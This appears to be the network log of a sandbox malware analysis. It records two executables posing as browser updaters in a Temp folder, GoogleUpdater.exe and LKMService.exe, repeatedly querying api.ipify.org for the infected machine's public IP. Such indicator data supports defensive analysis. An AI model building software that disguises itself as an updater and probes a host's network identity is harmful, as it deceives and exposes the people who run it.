                                                                                                                                                                                                                                          Oct 2, 2024 14:45:44.288480997 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:44 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4ca8f7fa35e82-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          45192.168.2.658694104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:48.567177057 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:49.041651964 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:48 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4caad2ef043aa-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          46192.168.2.658696104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:49.570669889 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:50.058264017 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:49 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cab36e137c78-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          47192.168.2.658698104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:50.298680067 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:50.749842882 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:50 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cab7da29de95-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          48192.168.2.658700104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:50.894824028 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:51.384442091 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:51 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cabbca5e42fb-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          49192.168.2.658704104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:57.454752922 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:57.921542883 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:57 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cae4aef13344-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          50192.168.2.658706104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:04.666903019 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:05.124798059 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:05 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb11a80b4258-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          51192.168.2.658707104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:04.946962118 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:05.467155933 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:05 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb13ce447d0b-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          52192.168.2.658710104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:06.070564985 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:06.572438002 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:06 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb1a9b35435d-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          53192.168.2.658711104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:06.406083107 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:06.862940073 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:06 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb1c8c6442bb-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          54192.168.2.658716104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:11.780040026 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:12.234461069 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:12 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb3e1bac17b1-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          55192.168.2.658718104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:13.344233036 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          56192.168.2.658719104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:15.651674032 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:16.108565092 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:16 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb5659044390-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          57192.168.2.658721104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:17.161295891 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:17.748995066 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:17 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb601de70f68-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          58192.168.2.658722104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:17.222203016 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:17.762305021 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:17 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb609db74229-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          59192.168.2.658727104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:22.219856977 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:22.684659958 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:22 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb7f69ae43f8-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          60192.168.2.658729104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:23.678961039 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:24.212512970 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:24 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb88ebe04219-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          61192.168.2.658730104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:24.159142017 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:24.660006046 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:24 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb8bb86bc336-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          62192.168.2.658734104.26.13.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:25.608340979 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:26.064435959 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:26 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb948fc34356-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          63192.168.2.658737104.26.13.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:28.541178942 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:29.020919085 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:28 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cba6ea26de9b-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          64192.168.2.658739104.26.13.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:30.021518946 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:30.498904943 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:30 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cbb01d7a8cda-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:30.715611935 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:30 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cbb01d7a8cda-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          65192.168.2.658740104.26.13.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:30.046566010 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:30.521644115 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:30 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cbb06b5042e9-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          66192.168.2.658743104.26.13.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:31.293312073 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:31.757478952 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:31 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cbb81e694401-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:31.967622995 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:31 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cbb81e694401-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          67192.168.2.658747104.26.13.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:36.279176950 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:36.759172916 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:36 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cbd75e350cbc-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
